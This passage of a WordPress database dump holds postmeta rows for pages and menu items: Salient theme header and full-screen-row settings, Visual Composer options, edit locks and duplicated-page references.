'post_type'),(5721,6495,'_menu_item_menu_item_parent','6280'),(5722,6495,'_menu_item_object_id','6493'),(5723,6495,'_menu_item_object','page'),(5724,6495,'_menu_item_target',''),(5725,6495,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5726,6495,'_menu_item_xfn',''),(5727,6495,'_menu_item_url',''),(5729,6496,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5730,6496,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5731,6496,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5732,6496,'_wp_page_template','default'),(5733,6496,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5734,6496,'nectar-metabox-portfolio-display-sortable','off'),(5735,6496,'_nectar_full_screen_rows','off'),(5736,6496,'_nectar_full_screen_rows_animation','none'),(5737,6496,'_nectar_full_screen_rows_animation_speed','medium'),(5738,6496,'_nectar_full_screen_rows_overall_bg_color',''),(5739,6496,'_nectar_full_screen_rows_anchors','off'),(5740,6496,'_nectar_full_screen_rows_mobile_disable','off'),(5741,6496,'_nectar_full_screen_rows_row_bg_animation','none'),(5742,6496,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5743,6496,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5744,6496,'_nectar_full_screen_rows_footer','none'),(5745,6496,'_nectar_slider_bg_type','image_bg'),(5746,6496,'_nectar_canvas_shapes',''),(5747,6496,'_nectar_media_upload_webm',''),(5748,6496,'_nectar_media_upload_mp4',''),(5749,6496,'_nectar_media_upload_ogv',''),(5750,6496,'_nectar_slider_preview_image',''),(5751,6496,'_nectar_header_bg',''),(5752,6496,'_nectar_header_parallax','off'),(5753,6496,'_nectar_header_box_roll','off'),(5754,6496,'_nectar_header_bg_height',''),(5755,6496,'_nectar_header_fullscreen','off'),(5756,6496,'_nectar_header_title',''),(5757,6496,'_nectar_header_subtitle',''),(5758,6496,'_nectar_page_header_text-effect','none'),(5759,6496,'_nectar_particle_rotation_timing',''),(5760,6496,'_nectar_particle_disable_explosion','off'),(5761,6496,'_nectar_page_header_alignment','left'),(5762,6496,'_nectar_page_header_alignment_v','middle'),(5763,6496,'_nectar_page_header_bg_alignment','center'),(5764,6496,'_nectar_header_bg_color',''),(5765,6496,'_nectar_header_font_color',''),(5766,6496,'_nectar_header_bg_overlay_color',''),(5767,6496,'_disable_transparent_header','off'),(5768,6496,'_force_transparent_header','off'),(5769,6496,'_wpb_vc_js_status','false'),(5771,6496,'_dp_original','6278'),(5772,6496,'_edit_lock','1514952715:1'),(5773,6496,'_edit_last','1'),(5774,6498,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5775,6498,'_menu_item_type','post_type'),(5776,6498,'_menu_item_menu_item_parent','6280'),(5777,6498,'_menu_item_object_id','6496'),(5778,6498,'_menu_item_object','page'),(5779,6498,'_menu_item_target',''),(5780,6498,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5781,6498,'_menu_item_xfn',''),(5782,6498,'_menu_item_url',''),(5784,6499,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5785,6499,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5786,6499,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5787,6499,'_wp_page_template','default'),(5788,6499,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5789,6499,'nectar-metabox-portfolio-display-sortable','off'),(5790,6499,'_nectar_full_screen_rows','off'),(5791,6499,'_nectar_full_screen_rows_animation','none'),(5792,6499,'_nectar_full_screen_rows_animation_speed','medium'),(5793,6499,'_nectar_full_screen_rows_overall_bg_color',''),(5794,6499,'_nectar_full_screen_rows_anchors','off'),(5795,6499,'_nectar_full_screen_rows_mobile_disable','off'),(5796,6499,'_nectar_full_screen_rows_row_bg_animation','none'),(5797,6499,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5798,6499,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5799,6499,'_nectar_full_screen_rows_footer','none'),(5800,6499,'_nectar_slider_bg_type','image_bg'),(5801,6499,'_nectar_canvas_shapes',''),(5802,6499,'_nectar_media_upload_webm',''),(5803,6499,'_nectar_media_upload_mp4',''),(5804,6499,'_nectar_media_upload_ogv',''),(5805,6499,'_nectar_slider_preview_image',''),(5806,6499,'_nectar_header_bg',''),(5807,6499,'_nectar_header_parallax','off'),(5808,6499,'_nectar_header_box_roll','off'),(5809,6499,'_nectar_header_bg_height',''),(5810,6499,'_nectar_header_fullscreen','off'),(5811,6499,'_nectar_header_title',''),(5812,6499,'_nectar_header_subtitle',''),(5813,6499,'_nectar_page_header_text-effect','none'),(5814,6499,'_nectar_particle_rotation_timing',''),(5815,6499,'_nectar_particle_disable_explosion','off'),(5816,6499,'_nectar_page_header_alignment','left'),(5817,6499,'_nectar_page_header_alignment_v','middle'),(5818,6499,'_nectar_page_header_bg_alignment','center'),(5819,6499,'_nectar_header_bg_color',''),(5820,6499,'_nectar_header_font_color',''),(5821,6499,'_nectar_header_bg_overlay_color',''),(5822,6499,'_disable_transparent_header','off'),(5823,6499,'_force_transparent_header','off'),(5824,6499,'_wpb_vc_js_status','false'),(5826,6499,'_dp_original','6278'),(5827,6499,'_edit_lock','1514952788:1'),(5828,6499,'_edit_last','1'),(5829,6501,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5830,6501,'_menu_item_type','post_type'),(5831,6501,'_menu_item_menu_item_parent','6280'),(5832,6501,'_menu_item_object_id','6499'),(5833,6501,'_menu_item_object','page'),(5834,6501,'_menu_item_target',''),(5835,6501,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5836,6501,'_menu_item_xfn',''),(5837,6501,'_menu_item_url',''),(5839,6502,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5840,6502,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5841,6502,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5842,6502,'_wp_page_template','default'),(5843,6502,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5844,6502,'nectar-metabox-portfolio-display-sortable','off'),(5845,6502,'_nectar_full_screen_rows','off'),(5846,6502,'_nectar_full_screen_rows_animation','none'),(5847,6502,'_nectar_full_screen_rows_animation_speed','medium'),(5848,6502,'_nectar_full_screen_rows_overall_bg_color',''),(5849,6502,'_nectar_full_screen_rows_anchors','off'),(5850,6502,'_nectar_full_screen_rows_mobile_disable','off'),(5851,6502,'_nectar_full_screen_rows_row_bg_animation','none'),(5852,6502,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5853,6502,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5854,6502,'_nectar_full_screen_rows_footer','none'),(5855,6502,'_nectar_slider_bg_type','image_bg'),(5856,6502,'_nectar_canvas_shapes',''),(5857,6502,'_nectar_media_upload_webm',''),(5858,6502,'_nectar_media_upload_mp4',''),(5859,6502,'_nectar_media_upload_ogv',''),(5860,6502,'_nectar_slider_preview_image',''),(5861,6502,'_nectar_header_bg',''),(5862,6502,'_nectar_header_parallax','off'),(5863,6502,'_nectar_header_box_roll','off'),(5864,6502,'_nectar_header_bg_height',''),(5865,6502,'_nectar_header_fullscreen','off'),(5866,6502,'_nectar_header_title',''),(5867,6502,'_nectar_header_subtitle',''),(5868,6502,'_nectar_page_header_text-effect','none'),(5869,6502,'_nectar_particle_rotation_timing',''),(5870,6502,'_nectar_particle_disable_explosion','off'),(5871,6502,'_nectar_page_header_alignment','left'),(5872,6502,'_nectar_page_header_alignment_v','middle'),(5873,6502,'_nectar_page_header_bg_alignment','center'),(5874,6502,'_nectar_header_bg_color',''),(5875,6502,'_nectar_header_font_color',''),(5876,6502,'_nectar_header_bg_overlay_color',''),(5877,6502,'_disable_transparent_header','off'),(5878,6502,'_force_transparent_header','off'),(5879,6502,'_wpb_vc_js_status','false'),(5881,6502,'_dp_original','6281'),(5882,6502,'_edit_lock','1514952903:1'),(5883,6502,'_edit_last','1'),(5884,6504,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5885,6504,'_menu_item_type','post_type'),(5886,6504,'_menu_item_menu_item_parent','6283'),(5887,6504,'_menu_item_object_id','6502'),(5888,6504,'_menu_item_object','page'),(5889,6504,'_menu_item_target',''),(5890,6504,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5891,6504,'_menu_item_xfn',''),(5892,6504,'_menu_item_url',''),(5894,6505,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5895,6505,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5896,6505,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5897,6505,'_wp_page_template','default'),(5898,6505,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5899,6505,'nectar-metabox-portfolio-display-sortable','off'),(5900,6505,'_nectar_full_screen_rows','off'),(5901,6505,'_nectar_full_screen_rows_animation','none'),(5902,6505,'_nectar_full_screen_rows_animation_speed','medium'),(5903,6505,'_nectar_full_screen_rows_overall_bg_color',''),(5904,6505,'_nectar_full_screen_rows_anchors','off'),(5905,6505,'_nectar_full_screen_rows_mobile_disable','off'),(5906,6505,'_nectar_full_screen_rows_row_bg_animation','none'),(5907,6505,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5908,6505,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5909,6505,'_nectar_full_screen_rows_footer','none'),(5910,6505,'_nectar_slider_bg_type','image_bg'),(5911,6505,'_nectar_canvas_shapes',''),(5912,6505,'_nectar_media_upload_webm',''),(5913,6505,'_nectar_media_upload_mp4',''),(5914,6505,'_nectar_media_upload_ogv',''),(5915,6505,'_nectar_slider_preview_image',''),(5916,6505,'_nectar_header_bg',''),(5917,6505,'_nectar_header_parallax','off'),(5918,6505,'_nectar_header_box_roll','off'),(5919,6505,'_nectar_header_bg_height',''),(5920,6505,'_nectar_header_fullscreen','off'),(5921,6505,'_nectar_header_title',''),(5922,6505,'_nectar_header_subtitle',''),(5923,6505,'_nectar_page_header_text-effect','none'),(5924,6505,'_nectar_particle_rotation_timing',''),(5925,6505,'_nectar_particle_disable_explosion','off'),(5926,6505,'_nectar_page_header_alignment','left'),(5927,6505,'_nectar_page_header_alignment_v','middle'),(5928,6505,'_nectar_page_header_bg_alignment','center'),(5929,6505,'_nectar_header_bg_color',''),(5930,6505,'_nectar_header_font_color',''),(5931,6505,'_nectar_header_bg_overlay_color',''),(5932,6505,'_disable_transparent_header','off'),(5933,6505,'_force_transparent_header','off'),(5934,6505,'_wpb_vc_js_status','false'),(5936,6505,'_dp_original','6281'),(5937,6505,'_edit_lock','1514952995:1'),(5938,6505,'_edit_last','1'),(5939,6507,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5940,6507,'_menu_item_type','post_type'),(5941,6507,'_menu_item_menu_item_parent','6283'),(5942,6507,'_menu_item_object_id','6505'),(5943,6507,'_menu_item_object','page'),(5944,6507,'_menu_item_target',''),(5945,6507,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(5946,6507,'_menu_item_xfn',''),(5947,6507,'_menu_item_url',''),(5949,6508,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5950,6508,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5951,6508,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5952,6508,'_wp_page_template','default'),(5953,6508,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(5954,6508,'nectar-metabox-portfolio-display-sortable','off'),(5955,6508,'_nectar_full_screen_rows','off'),(5956,6508,'_nectar_full_screen_rows_animation','none'),(5957,6508,'_nectar_full_screen_rows_animation_speed','medium'),(5958,6508,'_nectar_full_screen_rows_overall_bg_color',''),(5959,6508,'_nectar_full_screen_rows_anchors','off'),(5960,6508,'_nectar_full_screen_rows_mobile_disable','off'),(5961,6508,'_nectar_full_screen_rows_row_bg_animation','none'),(5962,6508,'_nectar_full_screen_rows_dot_navigation','tooltip'),(5963,6508,'_nectar_full_screen_rows_content_overflow','scrollbar'),(5964,6508,'_nectar_full_screen_rows_footer','none'),(5965,6508,'_nectar_slider_bg_type','image_bg'),(5966,6508,'_nectar_canvas_shapes',''),(5967,6508,'_nectar_media_upload_webm',''),(5968,6508,'_nectar_media_upload_mp4',''),(5969,6508,'_nectar_media_upload_ogv',''),(5970,6508,'_nectar_slider_preview_image',''),(5971,6508,'_nectar_header_bg',''),(5972,6508,'_nectar_header_parallax','off'),(5973,6508,'_nectar_header_box_roll','off'),(5974,6508,'_nectar_header_bg_height',''),(5975,6508,'_nectar_header_fullscreen','off'),(5976,6508,'_nectar_header_title',''),(5977,6508,'_nectar_header_subtitle',''),(5978,6508,'_nectar_page_header_text-effect','none'),(5979,6508,'_nectar_particle_rotation_timing',''),(5980,6508,'_nectar_particle_disable_explosion','off'),(5981,6508,'_nectar_page_header_alignment','left'),(5982,6508,'_nectar_page_header_alignment_v','middle'),(5983,6508,'_nectar_page_header_bg_alignment','center'),(5984,6508,'_nectar_header_bg_color',''),(5985,6508,'_nectar_header_font_color',''),(5986,6508,'_nectar_header_bg_overlay_color',''),(5987,6508,'_disable_transparent_header','off'),(5988,6508,'_force_transparent_header','off'),(5989,6508,'_wpb_vc_js_status','false'),(5991,6508,'_dp_original','6281'),(5992,6508,'_edit_lock','1514953076:1'),(5993,6508,'_edit_last','1'),(5994,6510,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5995,6510,'_menu_item_type','post_type'),(5996,6510,'_menu_item_menu_item_parent','6283'),(5997,6510,'_menu_item_object_id','6508'),(5998,6510,'_menu_item_object','page'),(5999,6510,'_menu_item_target',''),(6000,6510,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6001,6510,'_menu_item_xfn',''),(6002,6510,'_menu_item_url',''),(6004,6511,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6005,6511,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6006,6511,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6007,6511,'_wp_page_template','default'),(6008,6511,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6009,6511,'nectar-metabox-portfolio-display-sortable','off'),(6010,6511,'_nectar_full_screen_rows','off'),(6011,6511,'_nectar_full_screen_rows_animation','none'),(6012,6511,'_nectar_full_screen_rows_animation_speed','medium'),(6013,6511,'_nectar_full_screen_rows_overall_bg_color',''),(6014,6511,'_nectar_full_screen_rows_anchors','off'),(6015,6511,'_nectar_full_screen_rows_mobile_disable','off'),(6016,6511,'_nectar_full_screen_rows_row_bg_animation','none'),(6017,6511,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6018,6511,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6019,6511,'_nectar_full_screen_rows_footer','none'),(6020,6511,'_nectar_slider_bg_type','image_bg'),(6021,6511,'_nectar_canvas_shapes',''),(6022,6511,'_nectar_media_upload_webm',''),(6023,6511,'_nectar_media_upload_mp4',''),(6024,6511,'_nectar_media_upload_ogv',''),(6025,6511,'_nectar_slider_preview_image',''),(6026,6511,'_nectar_header_bg',''),(6027,6511,'_nectar_header_parallax','off'),(6028,6511,'_nectar_header_box_roll','off'),(6029,6511,'_nectar_header_bg_height',''),(6030,6511,'_nectar_header_fullscreen','off'),(6031,6511,'_nectar_header_title',''),(6032,6511,'_nectar_header_subtitle',''),(6033,6511,'_nectar_page_header_text-effect','none'),(6034,6511,'_nectar_particle_rotation_timing',''),(6035,6511,'_nectar_particle_disable_explosion','off'),(6036,6511,'_nectar_page_header_alignment','left'),(6037,6511,'_nectar_page_header_alignment_v','middle'),(6038,6511,'_nectar_page_header_bg_alignment','center'),(6039,6511,'_nectar_header_bg_color',''),(6040,6511,'_nectar_header_font_color',''),(6041,6511,'_nectar_header_bg_overlay_color',''),(6042,6511,'_disable_transparent_header','off'),(6043,6511,'_force_transparent_header','off'),(6044,6511,'_wpb_vc_js_status','false'),(6046,6511,'_dp_original','6284'),(6047,6511,'_edit_lock','1514953185:1'),(6048,6511,'_edit_last','1'),(6049,6513,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6050,6513,'_menu_item_type','post_type'),(6051,6513,'_menu_item_menu_item_parent','6286'),(6052,6513,'_menu_item_object_id','6511'),(6053,6513,'_menu_item_object','page'),(6054,6513,'_menu_item_target',''),(6055,6513,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6056,6513,'_menu_item_xfn',''),(6057,6513,'_menu_item_url',''),(6059,6514,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6060,6514,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6061,6514,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6062,6514,'_wp_page_template','default'),(6063,6514,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6064,6514,'nectar-metabox-portfolio-display-sortable','off'),(6065,6514,'_nectar_full_screen_rows','off'),(6066,6514,'_nectar_full_screen_rows_animation','none'),(6067,6514,'_nectar_full_screen_rows_animation_speed','medium'),(6068,6514,'_nectar_full_screen_rows_overall_bg_color',''),(6069,6514,'_nectar_full_screen_rows_anchors','off'),(6070,6514,'_nectar_full_screen_rows_mobile_disable','off'),(6071,6514,'_nectar_full_screen_rows_row_bg_animation','none'),(6072,6514,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6073,6514,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6074,6514,'_nectar_full_screen_rows_footer','none'),(6075,6514,'_nectar_slider_bg_type','image_bg'),(6076,6514,'_nectar_canvas_shapes',''),(6077,6514,'_nectar_media_upload_webm',''),(6078,6514,'_nectar_media_upload_mp4',''),(6079,6514,'_nectar_media_upload_ogv',''),(6080,6514,'_nectar_slider_preview_image',''),(6081,6514,'_nectar_header_bg',''),(6082,6514,'_nectar_header_parallax','off'),(6083,6514,'_nectar_header_box_roll','off'),(6084,6514,'_nectar_header_bg_height',''),(6085,6514,'_nectar_header_fullscreen','off'),(6086,6514,'_nectar_header_title',''),(6087,6514,'_nectar_header_subtitle',''),(6088,6514,'_nectar_page_header_text-effect','none'),(6089,6514,'_nectar_particle_rotation_timing',''),(6090,6514,'_nectar_particle_disable_explosion','off'),(6091,6514,'_nectar_page_header_alignment','left'),(6092,6514,'_nectar_page_header_alignment_v','middle'),(6093,6514,'_nectar_page_header_bg_alignment','center'),(6094,6514,'_nectar_header_bg_color',''),(6095,6514,'_nectar_header_font_color',''),(6096,6514,'_nectar_header_bg_overlay_color',''),(6097,6514,'_disable_transparent_header','off'),(6098,6514,'_force_transparent_header','off'),(6099,6514,'_wpb_vc_js_status','false'),(6101,6514,'_dp_original','6284'),(6102,6514,'_edit_lock','1514953277:1'),(6103,6514,'_edit_last','1'),(6104,6516,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6105,6516,'_menu_item_type','post_type'),(6106,6516,'_menu_item_menu_item_parent','6286'),(6107,6516,'_menu_item_object_id','6514'),(6108,6516,'_menu_item_object','page'),(6109,6516,'_menu_item_target',''),(6110,6516,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6111,6516,'_menu_item_xfn',''),(6112,6516,'_menu_item_url',''),(6114,6517,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6115,6517,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6116,6517,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6117,6517,'_wp_page_template','default'),(6118,6517,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6119,6517,'nectar-metabox-portfolio-display-sortable','off'),(6120,6517,'_nectar_full_screen_rows','off'),(6121,6517,'_nectar_full_screen_rows_animation','none'),(6122,6517,'_nectar_full_screen_rows_animation_speed','medium'),(6123,6517,'_nectar_full_screen_rows_overall_bg_color',''),(6124,6517,'_nectar_full_screen_rows_anchors','off'),(6125,6517,'_nectar_full_screen_rows_mobile_disable','off'),(6126,6517,'_nectar_full_screen_rows_row_bg_animation','none'),(6127,6517,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6128,6517,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6129,6517,'_nectar_full_screen_rows_footer','none'),(6130,6517,'_nectar_slider_bg_type','image_bg'),(6131,6517,'_nectar_canvas_shapes',''),(6132,6517,'_nectar_media_upload_webm',''),(6133,6517,'_nectar_media_upload_mp4',''),(6134,6517,'_nectar_media_upload_ogv',''),(6135,6517,'_nectar_slider_preview_image',''),(6136,6517,'_nectar_header_bg',''),(6137,6517,'_nectar_header_parallax','off'),(6138,6517,'_nectar_header_box_roll','off'),(6139,6517,'_nectar_header_bg_height',''),(6140,6517,'_nectar_header_fullscreen','off'),(6141,6517,'_nectar_header_title',''),(6142,6517,'_nectar_header_subtitle',''),(6143,6517,'_nectar_page_header_text-effect','none'),(6144,6517,'_nectar_particle_rotation_timing',''),(6145,6517,'_nectar_particle_disable_explosion','off'),(6146,6517,'_nectar_page_header_alignment','left'),(6147,6517,'_nectar_page_header_alignment_v','middle'),(6148,6517,'_nectar_page_header_bg_alignment','center'),(6149,6517,'_nectar_header_bg_color',''),(6150,6517,'_nectar_header_font_color',''),(6151,6517,'_nectar_header_bg_overlay_color',''),(6152,6517,'_disable_transparent_header','off'),(6153,6517,'_force_transparent_header','off'),(6154,6517,'_wpb_vc_js_status','false'),(6156,6517,'_dp_original','6284'),(6157,6517,'_edit_lock','1514953379:1'),(6158,6517,'_edit_last','1'),(6159,6519,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6160,6519,'_menu_item_type','post_type'),(6161,6519,'_menu_item_menu_item_parent','6286'),(6162,6519,'_menu_item_object_id','6517'),(6163,6519,'_menu_item_object','page'),(6164,6519,'_menu_item_target',''),(6165,6519,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6166,6519,'_menu_item_xfn',''),(6167,6519,'_menu_item_url',''),(6169,6520,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6170,6520,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6171,6520,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6172,6520,'_wp_page_template','default'),(6173,6520,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6174,6520,'nectar-metabox-portfolio-display-sortable','off'),(6175,6520,'_nectar_full_screen_rows','off'),(6176,6520,'_nectar_full_screen_rows_animation','none'),(6177,6520,'_nectar_full_screen_rows_animation_speed','medium'),(6178,6520,'_nectar_full_screen_rows_overall_bg_color',''),(6179,6520,'_nectar_full_screen_rows_anchors','off'),(6180,6520,'_nectar_full_screen_rows_mobile_disable','off'),(6181,6520,'_nectar_full_screen_rows_row_bg_animation','none'),(6182,6520,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6183,6520,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6184,6520,'_nectar_full_screen_rows_footer','none'),(6185,6520,'_nectar_slider_bg_type','image_bg'),(6186,6520,'_nectar_canvas_shapes',''),(6187,6520,'_nectar_media_upload_webm',''),(6188,6520,'_nectar_media_upload_mp4',''),(6189,6520,'_nectar_media_upload_ogv',''),(6190,6520,'_nectar_slider_preview_image',''),(6191,6520,'_nectar_header_bg',''),(6192,6520,'_nectar_header_parallax','off'),(6193,6520,'_nectar_header_box_roll','off'),(6194,6520,'_nectar_header_bg_height',''),(6195,6520,'_nectar_header_fullscreen','off'),(6196,6520,'_nectar_header_title',''),(6197,6520,'_nectar_header_subtitle',''),(6198,6520,'_nectar_page_header_text-effect','none'),(6199,6520,'_nectar_particle_rotation_timing',''),(6200,6520,'_nectar_particle_disable_explosion','off'),(6201,6520,'_nectar_page_header_alignment','left'),(6202,6520,'_nectar_page_header_alignment_v','middle'),(6203,6520,'_nectar_page_header_bg_alignment','center'),(6204,6520,'_nectar_header_bg_color',''),(6205,6520,'_nectar_header_font_color',''),(6206,6520,'_nectar_header_bg_overlay_color',''),(6207,6520,'_disable_transparent_header','off'),(6208,6520,'_force_transparent_header','off'),(6209,6520,'_wpb_vc_js_status','false'),(6211,6520,'_dp_original','6284'),(6212,6520,'_edit_lock','1514953457:1'),(6213,6520,'_edit_last','1'),(6214,6522,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6215,6522,'_menu_item_type','post_type'),(6216,6522,'_menu_item_menu_item_parent','6286'),(6217,6522,'_menu_item_object_id','6520'),(6218,6522,'_menu_item_object','page'),(6219,6522,'_menu_item_target',''),(6220,6522,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6221,6522,'_menu_item_xfn',''),(6222,6522,'_menu_item_url',''),(6224,6523,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6225,6523,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6226,6523,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6227,6523,'_wp_page_template','default'),(6228,6523,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6229,6523,'nectar-metabox-portfolio-display-sortable','off'),(6230,6523,'_nectar_full_screen_rows','off'),(6231,6523,'_nectar_full_screen_rows_animation','none'),(6232,6523,'_nectar_full_screen_rows_animation_speed','medium'),(6233,6523,'_nectar_full_screen_rows_overall_bg_color',''),(6234,6523,'_nectar_full_screen_rows_anchors','off'),(6235,6523,'_nectar_full_screen_rows_mobile_disable','off'),(6236,6523,'_nectar_full_screen_rows_row_bg_animation','none'),(6237,6523,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6238,6523,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6239,6523,'_nectar_full_screen_rows_footer','none'),(6240,6523,'_nectar_slider_bg_type','image_bg'),(6241,6523,'_nectar_canvas_shapes',''),(6242,6523,'_nectar_media_upload_webm',''),(6243,6523,'_nectar_media_upload_mp4',''),(6244,6523,'_nectar_media_upload_ogv',''),(6245,6523,'_nectar_slider_preview_image',''),(6246,6523,'_nectar_header_bg',''),(6247,6523,'_nectar_header_parallax','off'),(6248,6523,'_nectar_header_box_roll','off'),(6249,6523,'_nectar_header_bg_height',''),(6250,6523,'_nectar_header_fullscreen','off'),(6251,6523,'_nectar_header_title',''),(6252,6523,'_nectar_header_subtitle',''),(6253,6523,'_nectar_page_header_text-effect','none'),(6254,6523,'_nectar_particle_rotation_timing',''),(6255,6523,'_nectar_particle_disable_explosion','off'),(6256,6523,'_nectar_page_header_alignment','left'),(6257,6523,'_nectar_page_header_alignment_v','middle'),(6258,6523,'_nectar_page_header_bg_alignment','center'),(6259,6523,'_nectar_header_bg_color',''),(6260,6523,'_nectar_header_font_color',''),(6261,6523,'_nectar_header_bg_overlay_color',''),(6262,6523,'_disable_transparent_header','off'),(6263,6523,'_force_transparent_header','off'),(6264,6523,'_wpb_vc_js_status','false'),(6266,6523,'_dp_original','6284'),(6267,6523,'_edit_lock','1514953529:1'),(6268,6523,'_edit_last','1'),(6269,6525,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6270,6525,'_menu_item_type','post_type'),(6271,6525,'_menu_item_menu_item_parent','6286'),(6272,6525,'_menu_item_object_id','6523'),(6273,6525,'_menu_item_object','page'),(6274,6525,'_menu_item_target',''),(6275,6525,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(6276,6525,'_menu_item_xfn',''),(6277,6525,'_menu_item_url',''),(6279,6526,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6280,6526,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6281,6526,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6282,6526,'_wp_page_template','default'),(6283,6526,'nectar-metabox-portfolio-display','a:1:{i:0;s:3:\"all\";}'),(6284,6526,'nectar-metabox-portfolio-display-sortable','off'),(6285,6526,'_nectar_full_screen_rows','off'),(6286,6526,'_nectar_full_screen_rows_animation','none'),(6287,6526,'_nectar_full_screen_rows_animation_speed','medium'),(6288,6526,'_nectar_full_screen_rows_overall_bg_color',''),(6289,6526,'_nectar_full_screen_rows_anchors','off'),(6290,6526,'_nectar_full_screen_rows_mobile_disable','off'),(6291,6526,'_nectar_full_screen_rows_row_bg_animation','none'),(6292,6526,'_nectar_full_screen_rows_dot_navigation','tooltip'),(6293,6526,'_nectar_full_screen_rows_content_overflow','scrollbar'),(6294,6526,'_nectar_full_screen_rows_footer','none'),(6295,6526,'_nectar_slider_bg_type','image_bg'),(6296,6526,'_nectar_canvas_shapes',''),(6297,6526,'_nectar_media_upload_webm',''),(6298,6526,'_nectar_media_upload_mp4',''),(6299,6526,'_nectar_media_upload_ogv',''),(6300,6526,'_nectar_slider_preview_image',''),(6301,6526,'_nectar_header_bg',''),(6302,6526,'_nectar_header_parallax','off'),(6303,6526,'_nectar_header_box_roll','off'),(6304,6526,'_nectar_header_bg_height',''),(6305,6526,'_nectar_header_fullscreen','off'),(6306,6526,'_nectar_header_title',''),(6307,6526,'_nectar_header_subtitle',''),(6308,6526,'_nectar_page_header_text-effect','none'),(6309